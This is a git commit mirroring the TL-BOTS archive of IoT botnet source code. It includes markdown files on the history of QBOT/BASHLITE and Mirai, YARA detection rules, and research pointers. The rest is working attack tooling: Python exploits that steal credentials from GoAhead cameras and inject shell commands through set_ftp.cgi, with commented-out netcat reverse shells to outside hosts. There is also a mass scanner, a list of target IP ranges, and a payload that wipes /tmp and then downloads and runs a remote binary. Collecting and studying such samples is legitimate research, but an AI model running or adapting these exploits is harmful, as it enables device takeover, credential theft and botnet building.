mirror of https://github.com/threatland/TL-BOTS
Commit TL-BOTS
This commit is contained in:
commit
9ba773b5e1
|
@ -0,0 +1,103 @@
|
|||
## Etymology: QBOT / P2P / BASHLITE
|
||||
|
||||
Sources categorized under TL.P2P/P2P.* are from an older set of files that were then organized.
|
||||
The sources categorized under QBOT.* are similar in many ways to the P2P sources.
|
||||
|
||||
They both trace origins back to the BASHLITE family of malware, originally authored by
|
||||
LizardSquad for DDoS purposes. BASHLITE could also be found under the names Gafgyt,
|
||||
Lizkebab, Qbot, Torlus and LizardStresser, among many others.
|
||||
|
||||
The original version of these was written to exploit the ShellShock vulnerability in
|
||||
embedded Linux devices running BusyBox around 2014. After the source was leaked, it caused
|
||||
endless variants of dubious quality to be be released, which is what you see here.
|
||||
|
||||
One way to differentiate an older BASHLITE/P2P/QBOT source is by the use of the Ogre figlet
|
||||
font in the comments to seperate the different sections of the source file. Example:
|
||||
|
||||
// ___ __ _
|
||||
// / \___ / _(_)_ __ ___ ___
|
||||
// / /\ / _ \ |_| | '_ \ / _ \/ __|
|
||||
// / /_// __/ _| | | | | __/\__ \
|
||||
// /___,' \___|_| |_|_| |_|\___||___/
|
||||
|
||||
A near universal feature of these bots is the use of a Multiply-with-carry PRNG based on the constant PHI:
|
||||
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
This can be used as a signature for identification, summarized by these yara rules.
|
||||
|
||||
rule phiLE : QBOT {
|
||||
meta:
|
||||
Author = "u"
|
||||
Description = "Checks for PHI-based PRNG - Little Endian"
|
||||
strings:
|
||||
$phi0 = {b9 79 37 9e}
|
||||
condition:
|
||||
$phi0
|
||||
}
|
||||
rule phiBE : QBOT {
|
||||
meta:
|
||||
Author = "u"
|
||||
Description = "Checks for PHI-based PRNG - Big Endian"
|
||||
strings:
|
||||
$phi0 = {9e 37 79 b9}
|
||||
condition:
|
||||
$phi0
|
||||
}
|
||||
|
||||
Important Note: The term QBOT in this context is different from the QBOT or QAKBOT
|
||||
banking malware, which has been around for many years prior to these sources.
|
||||
|
||||
## Etymology: MIRAI
|
||||
|
||||
Mirai first appeared in August 2016 and has been covered extensively by numerous outlets.
|
||||
The collection of Mirai variants here represents a similar development pattern to the
|
||||
evolution of the BASHLITE/QBOT/P2P bots as detailed above.
|
||||
|
||||
While a good number of elements are shared between current variants of QBOT and MIRAI,
|
||||
a distinguishing feature of MIRAI is the command and control server structure that is
|
||||
written in Go and has a more streamlined method of managing tasks and bots.
|
||||
|
||||
Since earlier IoT malware relied generally on having single source files to represent
|
||||
a server, a client, and a script to cross compile for different architectures, the
|
||||
codebase for Mirai is markedly more robust. The sources for bots in Mirai are generally
|
||||
still written in C, but there is a greater deal of organization of various modules,
|
||||
allowing for much more rapid extension of bot capabilities.
|
||||
|
||||
## Targets
|
||||
|
||||
Modern MIRAI and QBOT sources target a core set of processor architectures used in IoT
|
||||
devices. They also use a very standard set of cross compilation tools and an easily
|
||||
configurable toolchain.
|
||||
|
||||
Table of targets
|
||||
|
||||
* arm
|
||||
* arm4
|
||||
* arm5
|
||||
* arm6
|
||||
* arm7
|
||||
* m68k
|
||||
* mips
|
||||
* mpsl
|
||||
* ppc
|
||||
* sh4
|
||||
* spc
|
||||
* x86
|
||||
* x86_32
|
||||
* x86_64
|
||||
|
||||
## Exploits
|
||||
|
||||
The BASHLITE malware family originally exploited ShellShock, but in the years since,
|
||||
new exploits for embedded devices have inevitably appeared, leading to a much larger
|
||||
variety of exploits being deployed by a given botnet.
|
||||
|
||||
Many of these are standard, publicly known exploits. In an attempt to appear to have
|
||||
an unknown or "private" exploit, some botnet owners attempt to sell modified versions
|
||||
of public exploits with very basic obfuscation in order to trick an inexperienced
|
||||
malware author into purchasing it.
|
||||
|
||||
Some exploits are also backdoored themselves, containing tricks to add users to the C2
|
||||
and to the bots.
|
||||
|
|
@ -0,0 +1,76 @@
|
|||
# TL-BOTS #
|
||||
|
||||
Welcome to the TL-BOTS repo. This collection contains source files, tools, and
|
||||
other components of a vast array of botnet families. The families covered here
|
||||
range from 2014/2015 to the present day.
|
||||
|
||||
Files in this collection have been gathered via distributed trawling of the
|
||||
internet, and deduplicated where applicable.
|
||||
|
||||
## Disclaimer ##
|
||||
|
||||
The files contained in this repo are for research purposes only. They are
|
||||
provided as-is and have no guarantee of functionality.
|
||||
|
||||
## What is a botnet? ##
|
||||
|
||||
A botnet is a network of infected devices that contact a Command and Control
|
||||
Server (C2) to receive instructions for attacks. Botnets are used for many
|
||||
different purposes, including DDoS, fraud, and loading/spreading other malware.
|
||||
|
||||
## Mitigations ##
|
||||
|
||||
Mitigations vary from system to system, but the core security principles apply
|
||||
to each of them. Regular patching, network segmentation, and proper device
|
||||
configuration are crucial to maintaining the security of devices.
|
||||
|
||||
## Navigating the Repo ##
|
||||
|
||||
The repo is divided into several folders, containing specific categories of
|
||||
activity.
|
||||
|
||||
Zip files may have the same or similar names, so each filename contains an
|
||||
identifier based on the first 6 characters of the SHA1 hash of the file.
|
||||
The formula is:
|
||||
|
||||
FILENAME.SHA1.EXTENSION
|
||||
|
||||
Non Zip files may contain this naming pattern as well.
|
||||
|
||||
## Collection Highlights ##
|
||||
|
||||
Nearly every version of Mirai and QBot since the beginning of both of these
|
||||
malware families is contained in this repo. For more information about the
|
||||
origin of these malware families, check out HISTORY.md
|
||||
|
||||
## Researching This Collection ##
|
||||
|
||||
This collection contains a vast number of botnets that have come and gone,
|
||||
and others that are still around in some form. While the bots themselves
|
||||
are steadily evolving, the core of many of them rely on exploiting whatever
|
||||
low hanging fruit is available at the time. A more detailed analysis of this
|
||||
collection, and resources to research further, is located in RESEARCH.md
|
||||
|
||||
## Contributing ##
|
||||
|
||||
Contributions to this repo are welcome. Simply fork this repo, open a pull
|
||||
request and consult with the repo maintainers about it.
|
||||
|
||||
### Guidelines ###
|
||||
|
||||
- Please submit larger files (> 5 MB) as a zip file in order to make cloning this a reasonable exercise.
|
||||
- Please try and follow our naming convention for zip files in order to deduplicate and identify hashes.
|
||||
|
||||
Files are subject to rejection if they do not meet our guidelines.
|
||||
|
||||
### We will NOT accept the following ###
|
||||
|
||||
- Combolists
|
||||
- Database dumps
|
||||
- Any credentials for active sites or devices, user, admin or otherwise
|
||||
|
||||
## Special Thanks ##
|
||||
|
||||
Special thanks goes to GreyNoise.io, who has catalogued nearly every exploit used
|
||||
in this collection. More information on using their tools to further research these
|
||||
botnets is located in RESEARCH.md
|
|
@ -0,0 +1,137 @@
|
|||
## Researching Botnets ##
|
||||
|
||||
There is a vast number of botnets featured in this repo, and there is an even
|
||||
larger number of them not catalogued here. This document should hopefully shed
|
||||
some light on what _is_ featured in this collection, and what you can do with
|
||||
this information.
|
||||
|
||||
## What is in this repo? ##
|
||||
|
||||
This information is subject to change, but is generally what was initially
|
||||
collected when this repo was created.
|
||||
|
||||
#### TL.BOTNET ####
|
||||
|
||||
These are botnets that may be merged with TL-TROJAN at a later date. There is
|
||||
a variety of Trojans and other malware with a distinct botnet component.
|
||||
|
||||
#### TL.EXPLOIT_SCAN ####
|
||||
|
||||
This is a collection of Exploits, and Vulnerability Scanners used by botnet
|
||||
maintainers.
|
||||
|
||||
Scanners are to generate lists of vulnerable IPs by checking whether or not
|
||||
they exhibit characteristics of a vulnerable device. In some cases, a scanner
|
||||
may perform the intial loading of a payload (eg. downloading a script), or
|
||||
other tactic to get an initial foothold, but this is not always the case.
|
||||
|
||||
Exploits are the exploits that are actually performed on a list of devices.
|
||||
They are usually python scripts, and either scan at random looking for a
|
||||
vulnerable IP, or they process a list of IPs generated by a Scanner to attempt
|
||||
to exploit them. Exploit scripts may at times contain a number of coding errors,
|
||||
that are a dead giveaway for those inspecting the scope of a single botnet.
|
||||
|
||||
#### TL.IRC ####
|
||||
|
||||
This is a collection of IRC based botnets. This type of botnet relies on an
|
||||
IRC server for command and control. They are less common now than they were
|
||||
before, largely due to more modern C2 options available. Many early QBOT variants
|
||||
were IRC based, and you may see some similarities in code to other botnets.
|
||||
|
||||
#### TL.JS ####
|
||||
|
||||
This is collection of nodeJS based botnets. They use a command and control
|
||||
architecture developed in nodeJS.
|
||||
|
||||
#### TL.LISTS ####
|
||||
|
||||
This information is available upon request.
|
||||
|
||||
#### TL.MIRAI ####
|
||||
|
||||
This is a collection of nearly every Mirai variant available until May 2019.
|
||||
There may be additional variants out there, but given the sample size, there
|
||||
are enough individual samples for a reasonable analysis.
|
||||
|
||||
Each variant is sorted by name, and within each folder, there may be different
|
||||
versions of a given variant.
|
||||
|
||||
Some variants may contain custom versions of exploits, with elements such as
|
||||
useragents, bot names, or other details that can aid in fingerprinting a given
|
||||
version.
|
||||
|
||||
#### TL.MISC ####
|
||||
|
||||
This collection contains sub collections that don't quite fit into any of the
|
||||
other categories. There are miscellaneous bots, tools, clients/servers, configs,
|
||||
and other ephemera that may be useful for research, but overall don't stand out
|
||||
enough on their own.
|
||||
|
||||
There is also a BIN.Archive folder in TL.MISC that contains some sample binaries
|
||||
from various bot campaigns in 2019 for research purposes.
|
||||
|
||||
#### TL.P2P ####
|
||||
|
||||
This collection contains some earlier versions of QBot malware that doesn't
|
||||
quite fit into the QBot category. They may be more unique forks, or contain
|
||||
elements from a completely different class of botnet. The variants in here
|
||||
are typically much older, as P2P refers to the method of self-replication, that
|
||||
was superceded by the slang term "self-rep". They may be treated as QBot-like,
|
||||
for research purposes, but they are not typically deployed as often in the wild
|
||||
due to relying on older self replication methods like simple telnet bruteforcing.
|
||||
|
||||
#### TL.QBOT ####
|
||||
|
||||
This collection contains many variants of the QBot family of malware. Dating all
|
||||
the way from 2014, when the first iterations appeared under the Lizkebab/Torlus
|
||||
names, up until today. The source is largely unchanged, but given the ease of set
|
||||
up, and the "stability" of the source, this family of bots will likely be around
|
||||
in some form for a while.
|
||||
|
||||
#### TL.TOOLS ####
|
||||
|
||||
This collection contains various tools and resources that have been included with
|
||||
many botnet source releases.
|
||||
|
||||
### Additional Information ###
|
||||
|
||||
In QBOT_HISTORY.md, we briefly touched on the history of a major family of botnets
|
||||
that was originally popularized when it was deployed by LizardSquad, and other
|
||||
groups, to perform some well-known DDoS attacks around 2014/2015.
|
||||
|
||||
Botnets in TL.BOTNET provide less of a historical resource, and more of an exhibition
|
||||
of some diversity in modern botnets. Many of the families included, such as ZeuS,
|
||||
have to continue to find new vectors through which to propagate. The source codes
|
||||
for these are much more complex than the IoT botnet families, and target consumer
|
||||
operating systems, rather than embedded.
|
||||
|
||||
## Informing the Present ##
|
||||
|
||||
There are many ways to use the source code in this repo to understand the state of
|
||||
botnets today. A multitude of tools and services exist for analyzing malware and
|
||||
how it spreads.
|
||||
|
||||
### Using Greynoise ###
|
||||
|
||||
GreyNoise has built a system that listens for traffic across the internet, and
|
||||
records them for researchers, corporations, and others, to understand the
|
||||
background noise of internet, and determine what they should be paying attention
|
||||
to. Using GreyNoise, we can take what we have learned from these botnet sources,
|
||||
tools, and exploits, and track what is still active in the wild.
|
||||
|
||||
With botnets, much of what we can see primarily relies on how the bots are
|
||||
attempting to self-replicate, or how malicious actors are scanning to determine
|
||||
whether or not a given system is exploitable.
|
||||
|
||||
GreyNoise has tagged a lot of malicious outgoing traffic based on various exploits
|
||||
that have been used in the malware contained in this repo. Taking a look at their
|
||||
[https://viz.greynoise.io/cheat-sheet/examples](cheatsheet), you can see that there are many ways to explore the dataset, and look
|
||||
up where certain types of malware may be operating from.
|
||||
|
||||
### Inhale ###
|
||||
|
||||
Inhale is a tool written by @netspooky that was used to aggregrate and classify
|
||||
a majority of the files you see in this repo. It uses a number of static analysis
|
||||
techniques to enumerate data from a given file, and store that information for
|
||||
further analysis. You can find out more information about using it [https://github.com/netspooky/inhale](here).
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,131 @@
|
|||
import socket
|
||||
import sys
|
||||
import re
|
||||
import time
|
||||
from multiprocessing import Process
|
||||
|
||||
def retrieve_credentials(host, port):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
# Retrieved credentials
|
||||
try:
|
||||
sock.send("GET login.cgi HTTP/1.0\n\n")
|
||||
resp = sock.recv(1024)
|
||||
# Double receive
|
||||
resp += sock.recv(1024)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
if not resp:
|
||||
sock.close()
|
||||
return 0
|
||||
index = resp.find("var login")
|
||||
done = resp[index:]
|
||||
m = done.strip("\r\n")
|
||||
l = m.split(" ")
|
||||
if len(l) <= 1:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
preuser = l[1].strip("var \r\n")
|
||||
prepass = l[2].strip("var \r\n")
|
||||
except:
|
||||
return 0
|
||||
username = preuser[11:].strip('";')
|
||||
password = prepass[11:].strip('";')
|
||||
sock.close()
|
||||
return username + ":" + password
|
||||
|
||||
def submit_payload(host, port, payload):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
sock.send(payload)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
sock.close()
|
||||
return 1
|
||||
|
||||
def submit_payload2(host, port, payload):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
sock.send(payload)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
now = time.clock()
|
||||
while (time.clock() - now) < 30:
|
||||
try:
|
||||
resp = sock.recv(1024)
|
||||
except:
|
||||
break
|
||||
if not resp:
|
||||
break
|
||||
if "ok" in resp:
|
||||
sock.close()
|
||||
return 1
|
||||
sock.close()
|
||||
return 0
|
||||
|
||||
def run(host, port):
|
||||
ret = retrieve_credentials(host, port)
|
||||
if ret == 0:
|
||||
return
|
||||
str = ret.split(":")
|
||||
username = str[0]
|
||||
password = str[1]
|
||||
if username != "" and password != "":
|
||||
print "Retrieved credentials %s:%s" % (str[0], str[1])
|
||||
else:
|
||||
return
|
||||
# Continue assuming we've retrieved the credentials successfully
|
||||
#payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
|
||||
for i in open("file", "r").readlines():
|
||||
line = i.strip("\r\n")
|
||||
payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
|
||||
ret = submit_payload(host, port, payload)
|
||||
if ret == 0:
|
||||
print "failed to send payload - %s (timeout?)" % (host)
|
||||
return
|
||||
payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
|
||||
ret = submit_payload2(host, port, payload2)
|
||||
if ret == 0:
|
||||
print "failed to send payload - %s (timeout?)" % (host)
|
||||
return
|
||||
"""payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
|
||||
ret = submit_payload(host, port, payload)
|
||||
if ret == 0:
|
||||
print "Failed to send initial payload"
|
||||
return
|
||||
print "Sent initial payload, building & preparing to send the second"
|
||||
payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
|
||||
ret = submit_payload2(host, port, payload2)
|
||||
if ret == 0:
|
||||
print "Failed to send submit payload"
|
||||
return"""
|
||||
|
||||
if __name__ == "__main__":
|
||||
for i in open("goahead", "r").readlines():
|
||||
line = i.strip("\r\n")
|
||||
info = line.split(":")
|
||||
ip = info[0]
|
||||
port = 81
|
||||
p = Process(target=run, args=(ip,port,))
|
||||
p.start()
|
|
@ -0,0 +1,131 @@
|
|||
import socket
|
||||
import sys
|
||||
import re
|
||||
import time
|
||||
from multiprocessing import Process
|
||||
|
||||
def retrieve_credentials(host, port):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
# Retrieved credentials
|
||||
try:
|
||||
sock.send("GET login.cgi HTTP/1.0\n\n")
|
||||
resp = sock.recv(1024)
|
||||
# Double receive
|
||||
resp += sock.recv(1024)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
if not resp:
|
||||
sock.close()
|
||||
return 0
|
||||
index = resp.find("var login")
|
||||
done = resp[index:]
|
||||
m = done.strip("\r\n")
|
||||
l = m.split(" ")
|
||||
if len(l) <= 1:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
preuser = l[1].strip("var \r\n")
|
||||
prepass = l[2].strip("var \r\n")
|
||||
except:
|
||||
return 0
|
||||
username = preuser[11:].strip('";')
|
||||
password = prepass[11:].strip('";')
|
||||
sock.close()
|
||||
return username + ":" + password
|
||||
|
||||
def submit_payload(host, port, payload):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
sock.send(payload)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
sock.close()
|
||||
return 1
|
||||
|
||||
def submit_payload2(host, port, payload):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, int(port)))
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
try:
|
||||
sock.send(payload)
|
||||
except:
|
||||
sock.close()
|
||||
return 0
|
||||
now = time.clock()
|
||||
while (time.clock() - now) < 30:
|
||||
try:
|
||||
resp = sock.recv(1024)
|
||||
except:
|
||||
break
|
||||
if not resp:
|
||||
break
|
||||
if "ok" in resp:
|
||||
sock.close()
|
||||
return 1
|
||||
sock.close()
|
||||
return 0
|
||||
|
||||
def run(host, port):
|
||||
ret = retrieve_credentials(host, port)
|
||||
if ret == 0:
|
||||
return
|
||||
str = ret.split(":")
|
||||
username = str[0]
|
||||
password = str[1]
|
||||
if username != "" and password != "":
|
||||
print "Retrieved credentials %s:%s" % (str[0], str[1])
|
||||
else:
|
||||
return
|
||||
# Continue assuming we've retrieved the credentials successfully
|
||||
#payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
|
||||
for i in open("payload_file", "r").readlines():
|
||||
line = i.strip("\r\n")
|
||||
payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginps=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
|
||||
ret = submit_payload(host, port, payload)
|
||||
if ret == 0:
|
||||
print "failed to send payload - %s (timeout?)" % (host)
|
||||
return
|
||||
payload2 = "GET /ftptest.cgi?loginuse=%s&loginps=%s HTTP/1.0\n\n" % (username, password)
|
||||
ret = submit_payload2(host, port, payload2)
|
||||
if ret == 0:
|
||||
print "failed to send payload - %s (timeout?)" % (host)
|
||||
return
|
||||
"""payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
|
||||
ret = submit_payload(host, port, payload)
|
||||
if ret == 0:
|
||||
print "Failed to send initial payload"
|
||||
return
|
||||
print "Sent initial payload, building & preparing to send the second"
|
||||
payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
|
||||
ret = submit_payload2(host, port, payload2)
|
||||
if ret == 0:
|
||||
print "Failed to send submit payload"
|
||||
return"""
|
||||
|
||||
if __name__ == "__main__":
|
||||
for i in open("goahead", "r").readlines():
|
||||
line = i.strip("\r\n")
|
||||
info = line.split(":")
|
||||
ip = info[0]
|
||||
port = 81
|
||||
p = Process(target=run, args=(ip,port,))
|
||||
p.start()
|
|
@ -0,0 +1,79 @@
|
|||
#!/usr/bin/python
|
||||
import sys, time, os, ssl, socket
|
||||
from threading import Thread
|
||||
if len(sys.argv) < 3:
|
||||
print "Usage: python "+sys.argv[0]+" <input> <threads> <output>"
|
||||
sys.exit()
|
||||
ips = map(lambda s: s.strip(), open(sys.argv[1], "r").readlines())
|
||||
threads = int(sys.argv[2])
|
||||
thread_count = len(ips) / threads
|
||||
thread_chunks = [ips[x:x+thread_count] for x in xrange(0, len(ips), thread_count)]
|
||||
output = sys.argv[3]
|
||||
found = 0
|
||||
cons = 0
|
||||
fails = 0
|
||||
proc = 0
|
||||
port = 81
|
||||
buf = 4096
|
||||
|
||||
headers = "GET /ftptest.cgi HTTP/1.0\r\n\r\n"
|
||||
|
||||
def checkhost_headers(host):
|
||||
global found
|
||||
global cons
|
||||
global fails
|
||||
host = host.strip("\n")
|
||||
cons += 1
|
||||
try:
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
sock.settimeout(5)
|
||||
sock.connect((host, port))
|
||||
except:
|
||||
failed += 1
|
||||
sock.close()
|
||||
sock.send(headers)
|
||||
time.sleep(2)
|
||||
resp = sock.recv(1024)
|
||||
if "GoAhead-Webs" in resp:
|
||||
file = open(output, "a+")
|
||||
file.write(host+"\n")
|
||||
file.close()
|
||||
found += 1
|
||||
sock.close()
|
||||
cons -= 1
|
||||
except:
|
||||
cons -= 1
|
||||
fails += 1
|
||||
pass
|
||||
def worker(count):
|
||||
global cons
|
||||
global failed
|
||||
global sent
|
||||
global proc
|
||||
global cons
|
||||
count = int(count)
|
||||
for i in thread_chunks[count]:
|
||||
try:
|
||||
proc += 1
|
||||
checkhost_headers(i)
|
||||
except:
|
||||
pass
|
||||
for x in xrange(threads):
|
||||
try:
|
||||
t = Thread(target=worker, args=(x,))
|
||||
t.start()
|
||||
except KeyboardInterrupt:
|
||||
sys.exit()
|
||||
except:
|
||||
pass
|
||||
while True:
|
||||
try: #prints the information like how many devices its tried
|
||||
i = found
|
||||
sys.stdout.write("\r\033[33mProccessed \033[92m[\033[93m"+str(proc)+"\033[92m]\033[33m || \033[33mFound \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m || Conns \033[92m[\033[93m"+str(cons)+"\033[92m] || Fails \033[92m[\033[93m"+str(fails)+"\033[92m]\033[0m")
|
||||
sys.stdout.flush()
|
||||
time.sleep(0.25)
|
||||
except KeyboardInterrupt:
|
||||
sys.exit("Exiting On User Input")
|
||||
except:
|
||||
pass
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,6 @@
|
|||
rm+-rf+/tmp/*
|
||||
echo+-e+"cd+/tmp"+>+/tmp/exploit
|
||||
echo+-e+"wget+http:/\/1.3.3.7/x656"+>>+/tmp/exploit
|
||||
echo+-e+"chmod+777+/tmp/x656"+>>+/tmp/exploit
|
||||
echo+-e+"/tmp/x656+exploit"+>>+/tmp/exploit
|
||||
sh+/tmp/exploit
|
|
@ -0,0 +1,191 @@
|
|||
1.0.0.0/8
|
||||
2.0.0.0/8
|
||||
5.0.0.0/8
|
||||
8.0.0.0/8
|
||||
12.0.0.0/8
|
||||
14.0.0.0/8
|
||||
23.0.0.0/8
|
||||
24.0.0.0/8
|
||||
27.0.0.0/8
|
||||
31.0.0.0/8
|
||||
32.0.0.0/8
|
||||
35.0.0.0/8
|
||||
36.0.0.0/8
|
||||
37.0.0.0/8
|
||||
38.0.0.0/8
|
||||
39.0.0.0/8
|
||||
40.0.0.0/8
|
||||
41.0.0.0/8
|
||||
42.0.0.0/8
|
||||
43.0.0.0/8
|
||||
45.0.0.0/8
|
||||
46.0.0.0/8
|
||||
47.0.0.0/8
|
||||
49.0.0.0/8
|
||||
50.0.0.0/8
|
||||
51.0.0.0/8
|
||||
52.0.0.0/8
|
||||
54.0.0.0/8
|
||||
58.0.0.0/8
|
||||
59.0.0.0/8
|
||||
60.0.0.0/8
|
||||
61.0.0.0/8
|
||||
62.0.0.0/8
|
||||
63.0.0.0/8
|
||||
64.0.0.0/8
|
||||
65.0.0.0/8
|
||||
66.0.0.0/8
|
||||
67.0.0.0/8
|
||||
68.0.0.0/8
|
||||
69.0.0.0/8
|
||||
70.0.0.0/8
|
||||
71.0.0.0/8
|
||||
72.0.0.0/8
|
||||
73.0.0.0/8
|
||||
74.0.0.0/8
|
||||
75.0.0.0/8
|
||||
76.0.0.0/8
|
||||
77.0.0.0/8
|
||||
78.0.0.0/8
|
||||
79.0.0.0/8
|
||||
80.0.0.0/8
|
||||
81.0.0.0/8
|
||||
82.0.0.0/8
|
||||
83.0.0.0/8
|
||||
84.0.0.0/8
|
||||
85.0.0.0/8
|
||||
86.0.0.0/8
|
||||
87.0.0.0/8
|
||||
88.0.0.0/8
|
||||
89.0.0.0/8
|
||||
90.0.0.0/8
|
||||
91.0.0.0/8
|
||||
92.0.0.0/8
|
||||
93.0.0.0/8
|
||||
94.0.0.0/8
|
||||
95.0.0.0/8
|
||||
96.0.0.0/8
|
||||
97.0.0.0/8
|
||||
98.0.0.0/8
|
||||
99.0.0.0/8
|
||||
100.0.0.0/8
|
||||
101.0.0.0/8
|
||||
102.0.0.0/8
|
||||
103.0.0.0/8
|
||||
104.0.0.0/8
|
||||
105.0.0.0/8
|
||||
106.0.0.0/8
|
||||
107.0.0.0/8
|
||||
108.0.0.0/8
|
||||
109.0.0.0/8
|
||||
110.0.0.0/8
|
||||
111.0.0.0/8
|
||||
112.0.0.0/8
|
||||
113.0.0.0/8
|
||||
114.0.0.0/8
|
||||
115.0.0.0/8
|
||||
116.0.0.0/8
|
||||
117.0.0.0/8
|
||||
118.0.0.0/8
|
||||
119.0.0.0/8
|
||||
120.0.0.0/8
|
||||
121.0.0.0/8
|
||||
122.0.0.0/8
|
||||
123.0.0.0/8
|
||||
124.0.0.0/8
|
||||
125.0.0.0/8
|
||||
126.0.0.0/8
|
||||
128.0.0.0/8
|
||||
129.0.0.0/8
|
||||
130.0.0.0/8
|
||||
131.0.0.0/8
|
||||
132.0.0.0/8
|
||||
133.0.0.0/8
|
||||
134.0.0.0/8
|
||||
135.0.0.0/8
|
||||
136.0.0.0/8
|
||||
137.0.0.0/8
|
||||
138.0.0.0/8
|
||||
139.0.0.0/8
|
||||
140.0.0.0/8
|
||||
141.0.0.0/8
|
||||
142.0.0.0/8
|
||||
143.0.0.0/8
|
||||
144.0.0.0/8
|
||||
145.0.0.0/8
|
||||
146.0.0.0/8
|
||||
147.0.0.0/8
|
||||
148.0.0.0/8
|
||||
149.0.0.0/8
|
||||
150.0.0.0/8
|
||||
151.0.0.0/8
|
||||
152.0.0.0/8
|
||||
153.0.0.0/8
|
||||
154.0.0.0/8
|
||||
155.0.0.0/8
|
||||
156.0.0.0/8
|
||||
157.0.0.0/8
|
||||
158.0.0.0/8
|
||||
159.0.0.0/8
|
||||
160.0.0.0/8
|
||||
161.0.0.0/8
|
||||
162.0.0.0/8
|
||||
163.0.0.0/8
|
||||
164.0.0.0/8
|
||||
165.0.0.0/8
|
||||
166.0.0.0/8
|
||||
167.0.0.0/8
|
||||
168.0.0.0/8
|
||||
169.0.0.0/8
|
||||
170.0.0.0/8
|
||||
171.0.0.0/8
|
||||
172.0.0.0/8
|
||||
173.0.0.0/8
|
||||
174.0.0.0/8
|
||||
175.0.0.0/8
|
||||
176.0.0.0/8
|
||||
177.0.0.0/8
|
||||
178.0.0.0/8
|
||||
179.0.0.0/8
|
||||
180.0.0.0/8
|
||||
181.0.0.0/8
|
||||
182.0.0.0/8
|
||||
183.0.0.0/8
|
||||
184.0.0.0/8
|
||||
185.0.0.0/8
|
||||
186.0.0.0/8
|
||||
187.0.0.0/8
|
||||
188.0.0.0/8
|
||||
189.0.0.0/8
